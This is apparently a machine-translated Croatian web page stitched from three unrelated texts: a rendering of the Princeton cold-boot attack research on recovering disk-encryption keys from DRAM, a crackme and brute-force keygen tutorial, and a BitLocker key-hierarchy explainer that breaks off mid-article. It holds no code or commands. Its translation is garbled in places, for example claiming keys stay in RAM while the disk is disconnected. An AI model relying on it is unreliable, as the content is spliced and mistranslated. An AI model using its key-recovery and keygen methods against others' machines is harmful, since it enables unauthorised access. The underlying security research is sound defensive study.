Računala Windows Internet

Verzije su šifrirane, a zatim hakirajte ovu. Hakiranje sustava za šifriranje tvrdog diska hladnim pokretanjem. Sigurno spavanje

Istraživači sa Sveučilišta Princeton otkrili su način zaobilaženja enkripcije tvrdog diska korištenjem sposobnosti RAM modula da zadrže informacije u kratkom vremenskom razdoblju čak i nakon nestanka struje.

Predgovor

Budući da za pristup šifriranom tvrdom disku morate imati ključ, a on je, naravno, pohranjen u RAM-u, potrebno je samo dobiti fizički pristup računalu na nekoliko minuta. Nakon ponovnog pokretanja s vanjskog tvrdog diska ili USB Flash-a, napravi se potpuni dump memorije i pristupni ključ se iz njega izvlači u roku od nekoliko minuta.

Na taj način možete dobiti ključeve za šifriranje (i potpuni pristup tvrdom disku) koje koriste BitLocker, FileVault i dm-crypt na operativnim sustavima Windows Vista, Mac OS X i Linux, kao i popularni besplatni sustav za šifriranje tvrdog diska TrueCrypt.

Važnost ovog rada leži u činjenici da ne postoji jednostavna metoda zaštite od ove metode hakiranja, osim isključivanja napajanja na dovoljno vrijeme da se podaci potpuno izbrišu.

Vizualna demonstracija procesa prikazana je u video.

napomena

Suprotno uvriježenom mišljenju, DRAM memorija koja se koristi u većini modernih računala zadržava podatke čak i nakon nestanka struje nekoliko sekundi ili minuta, štoviše, to se događa na sobnoj temperaturi, pa čak i ako se čip ukloni s matične ploče. Ovo vrijeme je sasvim dovoljno da se potpuno deponij RAM-a. Pokazat ćemo da ovaj fenomen omogućuje napadaču koji ima fizički pristup sustavu da zaobiđe funkcije OS-a za zaštitu podataka o kriptografskim ključevima. Pokazat ćemo kako se ponovno pokretanje može koristiti za uspješne napade na poznate sustave šifriranja tvrdog diska bez upotrebe specijaliziranih uređaja ili materijala. Eksperimentalno ćemo odrediti stupanj i vjerojatnost zadržavanja remanencije i pokazati da se jednostavnim trikovima može značajno povećati vrijeme za koje se podaci mogu uzeti. Također će biti predložene nove metode za pronalaženje kriptografskih ključeva u memorijskim dumpima i ispravljanje pogrešaka povezanih s bitovima koji nedostaju. Također ćemo govoriti o nekoliko načina za smanjenje tih rizika, ali ne znamo jednostavno rješenje.

Uvod

Većina stručnjaka pretpostavlja da se podaci iz RAM-a računala brišu gotovo odmah nakon nestanka struje ili smatraju da je preostale podatke iznimno teško dohvatiti bez upotrebe posebne opreme. Pokazat ćemo da su ove pretpostavke netočne. Konvencionalna DRAM memorija gubi podatke postupno tijekom nekoliko sekundi, čak i pri normalnim temperaturama, pa čak i ako se memorijski čip ukloni s matične ploče, podaci će u njemu ostati minutama ili čak satima, pod uvjetom da je čip pohranjen na niskim temperaturama. Preostali podaci mogu se oporaviti jednostavnim metodama koje zahtijevaju kratkoročni fizički pristup računalu.

Prikazat ćemo brojne napade koji će nam, koristeći efekte remanencije DRAM-a, omogućiti da povratimo ključeve za šifriranje pohranjene u memoriji. Ovo predstavlja stvarnu prijetnju korisnicima prijenosnih računala koji se oslanjaju na sustave šifriranja tvrdog diska. Doista, ako napadač ukrade prijenosno računalo, u trenutku kada je šifrirani disk spojen, moći će izvršiti jedan od naših napada kako bi pristupio sadržaju, čak i ako je sam laptop zaključan ili u stanju mirovanja. Pokazat ćemo to uspješnim napadom na nekoliko popularnih sustava za šifriranje kao što su BitLocker, TrueCrypt i FileVault. Ovi napadi također bi trebali biti uspješni protiv drugih sustava šifriranja.

Iako smo svoje napore usmjerili na sustave za šifriranje tvrdog diska, u slučaju fizičkog pristupa računalu napadača, svaka važna informacija pohranjena u RAM-u može postati predmet napada. Vjerojatno je da su mnogi drugi sigurnosni sustavi ranjivi. Na primjer, otkrili smo da Mac OS X ostavlja lozinke računa u memoriji gdje ih možemo dohvatiti, a također smo napali privatne RSA ključeve Apache web poslužitelja.

Neki u zajednicama za informacijsku sigurnost i fiziku poluvodiča već su bili svjesni efekta remanencije DRAM-a, o tome je bilo vrlo malo informacija. Kao rezultat toga, mnogi koji dizajniraju, razvijaju ili koriste sigurnosne sustave jednostavno nisu upoznati s ovim fenomenom i koliko ga napadač lako može iskoristiti. Koliko nam je poznato, ovo je prvi detaljan rad koji ispituje implikacije ovih pojava na informacijsku sigurnost.

Napadi na šifrirane diskove

Šifriranje tvrdih diskova dobro je poznata metoda zaštite od krađe podataka. Mnogi vjeruju da će sustavi za šifriranje tvrdog diska zaštititi njihove podatke, čak i ako je napadač dobio fizički pristup računalu (zapravo, za to su potrebni, ur.). Kalifornijski zakon, donesen 2002., zahtijeva prijavu mogućih otkrivanja osobnih podataka samo ako podaci nisu šifrirani, jer. šifriranje podataka smatra se dovoljnom zaštitnom mjerom. Iako zakon ne opisuje nikakva konkretna tehnička rješenja, mnogi stručnjaci preporučuju korištenje sustava za šifriranje tvrdog diska ili particije, što će se smatrati dovoljnim mjerama zaštite. Rezultati našeg istraživanja pokazali su da je uvjerenje u šifriranje diska neutemeljeno. Napadač, daleko od toga da je najkvalitetniji, može zaobići mnoge široko korištene sustave šifriranja ako se laptop s podacima ukrade dok je bio uključen ili u stanju mirovanja. A podaci na prijenosnom računalu mogu se čitati čak i ako su na šifriranom disku, tako da korištenje sustava za šifriranje tvrdog diska nije dovoljna mjera.

Koristili smo nekoliko vrsta napada na poznate sustave šifriranja tvrdog diska. Najviše vremena oduzimala je instalacija šifriranih diskova i provjera ispravnosti otkrivenih ključeva za šifriranje. Dobivanje RAM slike i traženje ključeva trajalo je samo nekoliko minuta i bilo je potpuno automatizirano. Postoji razlog za vjerovanje da je većina sustava za šifriranje tvrdog diska podložna takvim napadima.

bitlocker

BitLocker je sustav uključen u neke verzije sustava Windows Vista. Funkcionira kao pokretač između datotečnog sustava i upravljačkog programa tvrdog diska, šifrirajući i dešifrirajući odabrane sektore na zahtjev. Ključevi koji se koriste za šifriranje nalaze se u RAM-u sve dok je šifrirani disk isključen.

Za šifriranje svakog sektora tvrdog diska, BitLocker koristi isti par ključeva koji je generirao AES algoritam: ključ za šifriranje sektora i ključ za šifriranje koji rade u načinu ulančavanja blokova šifre (CBC). Ova dva ključa su zauzvrat šifrirana glavnim ključem. Za šifriranje sektora, izvodi se postupak dodavanja binarnog otvorenog teksta s ključem sesije generiranog šifriranjem bajta pomaka sektora s ključem za šifriranje sektora. Zatim se primljeni podaci obrađuju pomoću dvije funkcije miješanja koje koriste algoritam Elephant koji je razvio Microsoft. Ove funkcije bez ključa koriste se za povećanje broja promjena svih bitova šifre i, sukladno tome, povećavaju nesigurnost podataka šifriranog sektora. U posljednjoj fazi, podaci se šifriraju AES algoritmom u CBC modu, koristeći odgovarajući ključ za šifriranje. Vektor inicijalizacije određuje se šifriranjem bajta pomaka sektora s ključem za šifriranje koji se koristi u CBC načinu.

Implementirali smo potpuno automatizirani demo napad pod nazivom BitUnlocker. Ovo koristi vanjski USB pogon s Linux OS-om i modificirani program za podizanje sustava koji se temelji na SYSLINUX-u i upravljačkom programu FUSE koji vam omogućuje povezivanje BitLocker šifriranih pogona na Linux OS. Na testnom računalu sa sustavom Windows Vista, napajanje je isključeno, USB tvrdi disk je spojen i pokrenut s njega. Nakon toga, BitUnlocker je automatski izbacio RAM na vanjski pogon, tražio moguće ključeve pomoću programa keyfind, isprobao sve prikladne opcije (parove ključa za šifriranje sektora i ključa CBC načina rada) i, ako je uspio, spojio šifrirani disk . Čim je disk spojen, postalo je moguće raditi s njim kao i sa svakim drugim diskom. Na modernom prijenosnom računalu s 2 gigabajta RAM-a proces je trajao oko 25 minuta.

Važno je napomenuti da je ovaj napad postalo moguće izvesti bez obrnutog inženjeringa bilo kojeg softvera. Microsoftova dokumentacija opisuje sustav BitLocker dovoljno da se razumije uloga ključa za šifriranje sektora i ključa CBC načina rada i da se stvori vlastiti program koji implementira cijeli proces.

Glavna razlika između BitLockera i drugih programa ove klase je način na koji se ključevi pohranjuju kada je šifrirani pogon isključen. Prema zadanim postavkama, u osnovnom načinu rada, BitLocker štiti glavni ključ samo uz pomoć TPM modula, koji postoji na mnogim modernim računalima. Ova metoda, koja se čini naširoko korištena, posebno je ranjiva na naš napad, jer vam omogućuje da dobijete ključeve za šifriranje čak i ako je računalo duže vrijeme isključeno, jer kada se računalo pokrene, ključevi se automatski učitavaju u RAM (do prozora za prijavu) bez unosa podataka za autentifikaciju.

Navodno su stručnjaci Microsofta upoznati s ovim problemom i stoga preporučuju konfiguriranje BitLockera u poboljšanom načinu rada, gdje su ključevi zaštićeni ne samo uz pomoć TPM-a, već i lozinkom ili ključem na vanjskom USB disku. No, čak i u ovom načinu rada, sustav je ranjiv ako napadač dobije fizički pristup računalu dok ono radi (može biti čak i zaključan ili u stanju mirovanja, (stanja - samo isključeno ili hibernacija u ovom slučaju smatraju se da to ne utječe na ovim napadom).

Trezor datoteka

Appleov FileVault sustav je djelomično istražen i obrnutim inženjeringom. Na Mac OS X 10.4, FileVault koristi 128-bitni AES ključ u CBC načinu. Kada se unese korisnička lozinka, dešifrira se zaglavlje koje sadrži AES ključ i drugi ključ K2, koji se koristi za izračunavanje inicijalizacijskih vektora. Inicijalizacijski vektor za Ith blok diska izračunava se kao HMAC-SHA1 K2(I).

Koristili smo naš EFI program za snimanje RAM slika za dohvaćanje podataka s Macintosh računala (baziranog na Intelovom procesoru) s priključenim FileVault šifriranim pogonom. Program keyfind je tada pronašao FileVault AES ključeve automatski bez greške.

Bez vektora inicijalizacije, ali s primljenim AES ključem, postaje moguće dešifrirati 4080 od 4096 bajtova svakog bloka diska (sve osim prvog AES bloka). Uvjerili smo se da je vektor inicijalizacije također u dumpu. Pod pretpostavkom da podaci nisu oštećeni, napadač može odrediti vektor tako što će pokušati sve 160-bitne nizove u dumpu jedan po jedan i provjeriti mogu li formirati mogući otvoreni tekst kada se binarno dodaju dešifriranom prvom dijelu blok. Zajedno, korištenje programa kao što su vilefault, AES ključevi i inicijalizacijski vektor omogućuju vam potpuno dešifriranje šifriranog diska.

Istražujući FileVault, otkrili smo da Mac OS X 10.4 i 10.5 ostavljaju više kopija korisničke lozinke u memoriji, gdje su ranjivi na ovaj napad. Lozinke računa često se koriste za zaštitu ključeva, koji se zauzvrat mogu koristiti za zaštitu šifri na FileVault šifriranim pogonima.

TrueCrypt

TrueCrypt je popularan open source sustav šifriranja koji radi na Windows, MacOS i Linux. Podržava mnoge algoritme uključujući AES, Serpent i Twofish. U verziji 4, svi algoritmi su radili u LRW modu; u trenutnoj 5. verziji koriste XTS način rada. TrueCrypt pohranjuje ključ za šifriranje i ključ za podešavanje u zaglavlju particije na svakom pogonu, koji je šifriran drugim ključem izvedenim iz korisničke lozinke.

Testirali smo TrueCrypt 4.3a i 5.0a koji rade pod Linux OS-om. Spojili smo disk šifriran 256-bitnim AES ključem, zatim isključili napajanje i upotrijebili vlastiti softver za ispis memorije za pokretanje. U oba slučaja, keyfind je pronašao 256-bitni netaknuti ključ za šifriranje. Također, u slučaju TrueCrypt 5.0.a, keyfind je uspio oporaviti tipku za podešavanje načina XTS.

Za dešifriranje diskova koje je stvorio TrueCrypt 4, morate podesiti tipku LRW načina rada. Otkrili smo da ga sustav pohranjuje u četiri riječi prije ključnog AES rasporeda tipki. U našem deponiju, LRW ključ nije bio oštećen. (U slučaju pogrešaka, i dalje bismo mogli oporaviti ključ).

Dm-kripta

Linux kernel, počevši od verzije 2.6, uključuje ugrađenu podršku za dm-crypt, podsustav za šifriranje diska. Dm-crypt koristi mnoge algoritme i načine rada, ali prema zadanim postavkama koristi 128-bitnu AES šifru u CBC načinu s vektorima inicijalizacije koji se ne temelje na ključu.

Stvorenu dm-crypt particiju testirali smo pomoću grane LUKS (Linux Unified Key Setup) uslužnog programa cryptsetup i kernela 2.6.20. Disk je šifriran pomoću AES-a u CBC načinu. Isključili smo napajanje na neko vrijeme i koristeći modificirani PXE bootloader, napravili smo dump memorije. Program keyfind pronašao je važeći 128-bitni AES ključ, koji je vraćen bez ikakvih pogrešaka. Nakon što se obnovi, napadač može dešifrirati i montirati šifriranu particiju dm-crypt modificiranjem uslužnog programa cryptsetup tako da prihvaća ključeve u potrebnom formatu.

Metode zaštite i njihova ograničenja

Implementacija zaštite od napada na RAM nije trivijalna, budući da korišteni kriptografski ključevi moraju biti negdje pohranjeni. Predlažemo da se usredotočimo na uništavanje ili skrivanje ključeva prije nego što napadač može dobiti fizički pristup računalu, sprječavanje pokretanja softvera za ispis glavne memorije, fizičku zaštitu RAM čipova i, ako je moguće, smanjenje životnog vijeka podataka u RAM-u.

Prepisivanje memorije

Prije svega, potrebno je, ako je moguće, izbjeći pohranjivanje ključeva u RAM. Potrebno je prebrisati ključne informacije kada se više ne koriste i spriječiti kopiranje podataka u swap datoteke. Memorija se mora unaprijed očistiti pomoću OS-a ili dodatnih knjižnica. Naravno, ove mjere neće zaštititi ključeve koji se trenutno koriste, jer se moraju čuvati u memoriji, poput onih koji se koriste za šifrirane diskove ili na sigurnim web poslužiteljima.

Također, RAM se mora obrisati tijekom procesa pokretanja. Neka računala mogu se konfigurirati za brisanje RAM-a pri pokretanju pomoću jasnog POST zahtjeva (samotestiranje pri uključivanju) prije pokretanja OS-a. Ako napadač ne može spriječiti izvršenje ovog zahtjeva, tada na ovom računalu neće moći napraviti memorijski dump s važnim informacijama. No, još uvijek ima priliku izvući RAM čipove i umetnuti ih u drugo računalo s postavkama BIOS-a koje su mu potrebne.

Ograničavanje preuzimanja s mreže ili s prijenosnih medija

Mnogi od naših napada provedeni su korištenjem mrežnog pokretanja ili prijenosnih medija. Računalo mora biti konfigurirano da zahtijeva administratorsku lozinku za pokretanje s ovih izvora. No, treba napomenuti da čak i ako je sustav konfiguriran da se pokreće samo s glavnog tvrdog diska, napadač može promijeniti sam tvrdi disk ili u mnogim slučajevima resetirati NVRAM računala kako bi se vratio na izvorne postavke BIOS-a.

Sigurno spavanje

Rezultati studije pokazali su da jednostavno zaključavanje radne površine računala (odnosno OS nastavlja raditi, ali da bi se s njim započela interakcija, potrebno je unijeti lozinku) ne štiti sadržaj RAM-a. Način mirovanja nije učinkovit čak i ako je računalo blokirano prilikom vraćanja iz stanja mirovanja, jer napadač može aktivirati povratak iz stanja mirovanja, zatim ponovno pokrenuti prijenosno računalo i napraviti dump memorije. Način hibernacije (sadržaj RAM-a se kopira na tvrdi disk) također neće pomoći, osim kada koristite ključne informacije na otuđenim medijima za vraćanje normalnog rada.

Uz većinu sustava za šifriranje tvrdog diska, korisnici se mogu zaštititi gašenjem računala. (Sustav Bitlocker u osnovnom načinu rada TPM modula ostaje ranjiv, budući da će se pogon automatski spojiti kada se računalo uključi). Sadržaj memorije može se zadržati kratko vrijeme nakon isključivanja, stoga se preporučuje da nadzirete svoju radnu stanicu još nekoliko minuta. Unatoč svojoj učinkovitosti, ova mjera je iznimno nezgodna zbog dugog učitavanja radnih stanica.

Hibernacija se može osigurati na sljedeće načine: zahtijevati lozinku ili neku drugu tajnu za "probuđenje" radne stanice i šifrirati sadržaj memorije ključem izvedenim iz te lozinke. Lozinka mora biti jaka, jer napadač može napraviti ispis memorije, a zatim pokušati pogoditi lozinku grubom silom. Ako nije moguće šifrirati cijelu memoriju, potrebno je šifrirati samo ona područja koja sadrže ključne informacije. Neki sustavi mogu biti konfigurirani za ulazak u ovu vrstu zaštićenog mirovanja, iako to obično nije zadana postavka.

Odbijanje predkalkulacija

Naše istraživanje je pokazalo da korištenje predračunanja za ubrzavanje kriptografskih operacija čini ključne informacije ranjivijim. Predračunanje dovodi do činjenice da se u memoriji nalaze suvišne informacije o ključnim podacima, što napadaču omogućuje da povrati ključeve čak i ako postoje greške. Na primjer, kao što je opisano u odjeljku 5, informacije o iteracijskim ključevima AES i DES algoritama iznimno su suvišne i korisne napadaču.

Odbijanje predračunanja će smanjiti performanse, jer će se potencijalno složeni izračuni morati ponoviti. Ali, na primjer, možete keširati unaprijed izračunate vrijednosti za određeno vremensko razdoblje i izbrisati primljene podatke ako se ne koriste tijekom tog intervala. Ovaj pristup predstavlja kompromis između sigurnosti i performansi sustava.

Proširenje ključa

Drugi način za sprječavanje oporavka ključa je modificiranje ključnih informacija pohranjenih u memoriji na takav način da se oporavak ključa otežava zbog raznih pogrešaka. Ova metoda je razmatrana u teoriji, gdje se pokazalo da je funkcija otporna na otkrivanje, čiji ulazi ostaju skriveni čak i ako se otkriju gotovo svi izlazi, što je vrlo slično radu jednosmjernih funkcija.

U praksi zamislite da imamo 256-bitni AES ključ K koji trenutno nije u upotrebi, ali će nam kasnije trebati. Ne možemo ga prebrisati, ali ga želimo učiniti otpornim na pokušaje oporavka. Jedan od načina da se to postigne je dodijeliti veliko B-bitno područje podataka, ispuniti ga slučajnim podacima R, a zatim pohraniti u memoriju rezultat sljedeće transformacije K + H (R) (binarno zbrajanje, pribl. ur.), gdje je H hash funkcija, kao što je SHA-256.

Sada zamislite da je struja isključena, to će uzrokovati promjenu d bitova u ovom području. Ako je hash funkcija jaka, prilikom pokušaja povratka ključa K, napadač se može osloniti samo na to da može pogoditi koji su bitovi područja B promijenjeni od otprilike polovice koja bi se mogla promijeniti. Ako su d bitova promijenjeni, napadač će morati tražiti regiju veličine (B/2+d)/d kako bi pronašao ispravne vrijednosti R, a zatim povratio ključ K. Ako je regija B velika, takva pretraga može biti vrlo duga, čak i ako je d relativno mali.

Teoretski, na ovaj način možemo pohraniti sve ključeve, izračunavajući svaki ključ samo kada nam je potreban, a brišemo ga kada nam nije potreban. Dakle, primjenom gornje metode možemo pohraniti ključeve u memoriju.

Fizička zaštita

Neki od naših napada oslanjali su se na fizički pristup memorijskim čipovima. Takvi se napadi mogu spriječiti fizičkom zaštitom memorije. Na primjer, memorijski moduli se drže u zatvorenom kućištu računala ili zapečaćeni epoksidom kako bi se spriječili pokušaji uklanjanja ili pristupa. Također, moguće je implementirati prepisivanje memorije kao odgovor na niske temperature ili pokušaje otvaranja kućišta. Ova metoda zahtijeva ugradnju senzora s neovisnim sustavom napajanja. Mnoge od ovih metoda uključuju hardver otporan na neovlašteno korištenje (kao što je IBM 4758 koprocesor) i mogu uvelike povećati cijenu radne stanice. S druge strane, korištenje memorije zalemljene na matičnu ploču puno je jeftinije.

Promjena arhitekture

Možete promijeniti arhitekturu računala. Što je nemoguće za već korištena računala, ali će vam omogućiti da osigurate nova.

Prvi pristup je dizajnirati DRAM module na način da brže brišu sve podatke. To može biti nezgodno jer je cilj što bržeg brisanja podataka u sukobu s drugim ciljem da se podaci ne izgube između razdoblja osvježavanja memorije.

Drugi pristup je dodavanje ključnog hardvera za pohranu koji će zajamčeno izbrisati sve informacije iz svoje pohrane pri pokretanju, ponovnom pokretanju i isključivanju. Tako ćemo dobiti sigurno mjesto za pohranu nekoliko ključeva, iako će ranjivost povezana s njihovim predračunavanjem ostati.

Drugi stručnjaci su predložili arhitekturu u kojoj će sadržaj memorije biti trajno šifriran. Ako, osim ovoga, implementirate brisanje ključeva prilikom ponovnog pokretanja i nestanka struje, tada će ova metoda pružiti dovoljnu zaštitu od napada koje smo opisali.

Pouzdano računalstvo

Hardver koji odgovara konceptu "pouzdanog računalstva", na primjer, u obliku TPM modula, već se koristi u nekim računalima. Unatoč njihovoj korisnosti u zaštiti od nekih napada, u sadašnjem obliku takva oprema ne pomaže u sprječavanju napada koje smo opisali.

Korišteni TPM moduli ne implementiraju potpunu enkripciju. Umjesto toga, oni promatraju proces pokretanja kako bi odlučili je li sigurno pokrenuti ključ u RAM ili ne. Ako softver treba koristiti ključ, tada se može implementirati sljedeća tehnologija: ključ, u upotrebljivom obliku, neće biti pohranjen u RAM-u sve dok proces pokretanja ne prođe prema očekivanom scenariju. Ali, čim je ključ u RAM-u, odmah postaje meta naših napada. TPM moduli mogu spriječiti učitavanje ključa u memoriju, ali ne sprječavaju njegovo čitanje iz memorije.

nalazima

Suprotno uvriježenom mišljenju, DRAM moduli pohranjuju podatke relativno dugo kada su onemogućeni. Naši eksperimenti su pokazali da ovaj fenomen omogućuje implementaciju cijele klase napada koji vam omogućuju da dobijete važne podatke, kao što su ključevi za šifriranje, iz RAM-a, unatoč pokušajima OS-a da zaštiti svoj sadržaj. Napadi koje opisujemo ostvarivi su u praksi, a to dokazuju i naši primjeri napada na popularne enkripcijske sustave.

Ali druge vrste softvera također su ranjive. Sustavi upravljanja digitalnim pravima (DRM) često koriste simetrične ključeve pohranjene u memoriji, a oni se također mogu dobiti opisanim metodama. Kao što smo pokazali, web poslužitelji s omogućenim SSL-om također su ranjivi jer pohranjuju u memoriju privatne ključeve potrebne za stvaranje SSL sesija. Naše metode traženja ključnih informacija vjerojatno će biti učinkovite za pronalaženje lozinki, brojeva računa i svih drugih važnih informacija pohranjenih u RAM-u.

Čini se da ne postoji jednostavan način za uklanjanje pronađenih ranjivosti. Promjena softvera najvjerojatnije neće biti učinkovita; promjene hardvera će pomoći, ali će troškovi vremena i resursa biti visoki; tehnologija "pouzdanog računanja" u svom trenutnom obliku također nije vrlo učinkovita, budući da ne može zaštititi ključeve koji se nalaze u memoriji.

Prema našem mišljenju, ovom riziku najviše su izložena prijenosna računala koja se često nalaze na javnim mjestima i rade u načinima osjetljivim na ove napade. Prisutnost takvih rizika pokazuje da šifriranje diska štiti važne podatke u manjoj mjeri nego što se uobičajeno vjeruje.

Kao rezultat toga, možda ćete DRAM memoriju morati smatrati nepouzdanom komponentom modernog računala i izbjegavati obradu važnih povjerljivih informacija u njoj. Ali u ovom trenutku to nije praktično, sve dok se arhitektura modernih računala ne promijeni kako bi se softveru omogućilo pohranjivanje ključeva na sigurno mjesto.

UVOD

Krakmi to
program (obično male veličine 1-2
kilobajt) za koji trebate pogoditi lozinku
ili napraviti ključ. Krakmi se obično piše
provjeriti razinu znanja ljudi u struci
kriptografiju i programe za hakiranje. Krak mi
dolazi od engleske fraze Crack Me -
razbiti me.

nekako meni
bilo je potrebno umetnuti podršku za "registraciju"
ključeve jednog od komercijalnih programa. Na
taj trenutak iskustva u ovoj stvari koje sam imao
poprilično, nekako sam pokušao hakirati
nekoliko crackme, ali ništa nije upalilo i ja
brzo bacio. Ali kad je došao poticaj, ja
Odlučio sam početi s crackmeom i sada to radim
učenje različitih algoritama šifriranja
podatke (kao što su DES, TWODES, RSA i drugi). Dosta
moguće je da će moji sljedeći članci biti o
algoritmi za šifriranje,
korištenje ovih algoritama je značajno
povećava vrijeme utrošeno na hakiranje.

VRSTE CRACKME

S obzirom
razne pukotine, izdvojio sam dvije glavne
tip: šifrirani crakmi i koji sadrži
samo algoritam.

Dekoder
Krakmi prve vrste obično sadrži
mnogi "trikovi" protiv otklanjanja pogrešaka (složenost
ovih tehnika ovisi o razini znanja
osoba koja je napisala krakmi, najviše
uobičajene trikove je lako zaobići
ljudi i ispravljači pogrešaka koji rade pod
zaštićeni način rada i prije
da biste počeli analizirati algoritam, morate dobiti
dešifrirani kod. Što teže
dešifrirati, (najvjerojatnije) teže
postojat će algoritam za odabir lozinke (ili lozinki)
njemu. Vrlo često se ispostavi da
algoritam od 300 bajtova može biti teže razbiti,
nego dešifrirati krakmi. Bez znanja
matematičari također ne savjetuju razbijanje pukotina
koji koriste RSA algoritam (algoritam
šifriranje podataka javnim ključem) ili
sličan. Naravno, bolje je početi s
nešifrirane pukotine. Također ne preporučam
pokušava razbiti crakmi iz grupa UCL, UCF, rPG, SOS
- Samo gubiš vrijeme.

U nekim
Krakmi ne treba znati lozinku, nego
napraviti registracijski ključ. Postupak
otpad poput crakmi nije puno
razlikuje se od "lozinke", ali je više "približna"
razbiti programe.

ALGORITAM PREKIDA
CRACKME

Složene pukotine
razbijen brute-force lozinkama, for
za to su napisani mali programi. Češće
postoji samo jedna lozinka. Složenost
povećava zbog veličine potrebnog
lozinku i znakove iz kojih mora
sastoje se.

Algoritam:

    Analiza
    algoritam za provjeru lozinke

    Pisanje
    keygen (pogađanje lozinke)

    Pokretanje Keygena

ANALIZA ALGORITAMA
PROVJERA LOZINKE

Za analizu
algoritam treba pažljivo proučiti
provjera lozinke. Za ovo, tvoj
omiljeni debugger (Soft Ice, TD, DeGlucker...), potreban vam je
pažljivo pogledajte što se provjerava
lozinka. Može se provjeriti
zbroj (crc), u ovom slučaju najvjerojatnije lozinka
morat će tražiti grubom silom, ili će možda
onda provjeri neki lik
možete "pogoditi" cijelu lozinku, ili barem
nekoliko njegovih likova, ostali će morati
traži pretraživanjem.

Kontrolirati
zbroj dijela koda, ovo je broj (obično dva
ili četiri bajta, u krami mogu
korišteni i jedan bajt) koji
sadrži informacije o ovom dijelu koda.
Za krakmi se obično koriste postupci
primitivno izračunavanje kontrolnog zbroja (npr
arhivari koriste crc32). Smatrati
primjer algoritma koji izračunava
kontrolni zbroj:

Na primjer, sve
bajtovi dijagrama se zbrajaju i ispada
broj je broj i je kontrola
iznos površine. Na primjer, imamo parcelu
kod, koji se sastoji od 5 bajtova:

001 004 000 005 100

Kontrolirati
njegov će zbroj biti jednak 1+4+0+5+100=110.

Glavni
poteškoća hakiranja pukotina koje provjeravaju
lozinka za crc je da se crc ne može razložiti! Oni.
znajući kontrolni zbroj lozinke - 110 ne znamo
možemo saznati što barem jedan od
elementi lozinke.

PISANJE KLJUČA

Praktično za
sve vrste krekera trebaju napisati keygen,
osim pluća. Može se lako slomiti
gotovo svaki krami bit hack (bit hack,
zamjena nekoliko bajtova), ali autori traže
izgovorite lozinku, a ono najvažnije je izgubljeno
interes.

Da bi
za pronalaženje lozinke od 3 znaka potrebno je
otprilike otprilike:255
* 255 * 255 KOMBINACIJE

Može se smanjiti
broj kombinacija, na primjer znajući da u
lozinka koristi samo engleski
slova (velika i mala), tada umjesto 255
znakova će morati ponoviti samo 52. Ako
samo brojevi koje ćemo ponavljati preko samo 10
likovima.

Keygen bi trebao
spremi brojač dešifriranih
kombinacije. Od brute-force lozinki
dugo traje, a onda odlazi
ne možete uključiti računalo nekoliko dana,
odjednom ti treba. Može se umetnuti u
keygen mogućnost spremanja brojača u
datoteku i pri pokretanju je pročitajte iz datoteke i
nastaviti dešifriranje od prekinutog
pozicije.

POKRENI KEYGEN

brute-force lozinke,
ovisno o nekim parametrima (u
uglavnom na broj mogućih lozinki
znakova i veličine lozinke) zahtijeva
prilično veliki vremenski period.
Može se koristiti više računala
od kojih će svaki provjeriti neke
neke od kombinacija.

Mnogi koriste značajku šifriranja sustava Windows, ali ne razmišljaju svi o sigurnosti ove metode zaštite podataka. Danas ćemo razgovarati o Bitlocker enkripciji i pokušati shvatiti koliko je dobro implementirana Windows zaštita diska.

Usput, o tome kako postaviti Bitlocker možete pročitati u članku "".

  • Predgovor
  • Kako Bitlocker radi?
    • Ranjivosti
    • Ključevi za oporavak
    • Otvaranje BitLockera
    • BitLocker To Go
  • Zaključak

Članak je napisan u istraživačke svrhe. Sve informacije u njemu služe samo u informativne svrhe. Namijenjen je sigurnosnim stručnjacima i onima koji to žele postati.

Kako Bitlocker radi?

Što je Bitlocker?

BitLocker je značajka šifriranja izvornog diska u operacijskim sustavima Windows 7, 8, 8.1, 10. Ova značajka omogućuje sigurno šifriranje povjerljivih podataka na računalu, kako na HDD-u i SSD-u, tako i na prijenosnim medijima.

Kako je BitLocker postavljen?

Pouzdanost BitLockera ne bi se trebala suditi po ugledu na AES. Popularni standard šifriranja možda nema iskreno slabe točke, ali njegove implementacije u određenim kriptografskim proizvodima često obiluju njima. Microsoft ne otkriva cijeli kod za BitLocker tehnologiju. Poznato je samo da se u različitim verzijama Windowsa temeljio na različitim shemama, a promjene se ni na koji način nisu komentirale. Štoviše, u build 10586 Windowsa 10 jednostavno je nestao, a nakon dvije verzije ponovno se pojavio. Međutim, prvo o svemu.

Prva verzija BitLockera koristila je način ulančavanja blokova šifriranog teksta (CBC). Već tada su bili očiti njezini nedostaci: lakoća napada na poznati tekst, slaba otpornost na napade po vrsti zamjene i tako dalje. Stoga je Microsoft odmah odlučio pojačati zaštitu. Već u Visti, algoritam Elephant Diffuser dodan je AES-CBC shemi, što otežava izravnu usporedbu blokova šifriranog teksta. Kod njega je isti sadržaj dvaju sektora dao, nakon enkripcije jednim ključem, potpuno drugačiji rezultat, što je zakompliciralo izračun zajedničkog uzorka. Međutim, sam zadani ključ bio je kratak - 128 bita. Putem administrativnih politika može se proširiti na 256 bita, ali isplati li se?

Za korisnike, nakon promjene ključa, ništa se neće promijeniti izvana - ni duljina unesenih lozinki, niti subjektivna brzina operacija. Kao i većina sustava za šifriranje cijelog diska, BitLocker koristi više ključeva... i nijedan od njih nije vidljiv korisnicima. Ovdje je shematski dijagram BitLockera.

  • Kada se BitLocker aktivira pomoću generatora pseudo-slučajnih brojeva, generira se glavni slijed bitova. Ovo je ključ za šifriranje volumena - FVEK (ključ za šifriranje punog volumena). On je taj koji sada šifrira sadržaj svakog sektora.
  • Zauzvrat, FVEK se šifrira pomoću drugog ključa - VMK (glavni ključ volumena) - i pohranjuje u šifriranom obliku među metapodacima volumena.
  • Sam VMK je također šifriran, ali na različite načine po izboru korisnika.
  • Na novim matičnim pločama, VMK ključ je šifriran prema zadanim postavkama pomoću SRK ključa (korijenski ključ za pohranu), koji je pohranjen u zasebnom kriptoprocesoru - modulu pouzdane platforme (TPM). Korisnik nema pristup TPM sadržaju i jedinstven je za svako računalo.
  • Ako na ploči nema zasebnog TPM čipa, tada se umjesto SRK-a za šifriranje VMK ključa koristi pin kod koji je unio korisnik ili USB flash pogon na zahtjev s unaprijed upisanim informacijama o ključu.
  • Osim TPM-a ili flash pogona, VMK ključ možete zaštititi lozinkom.

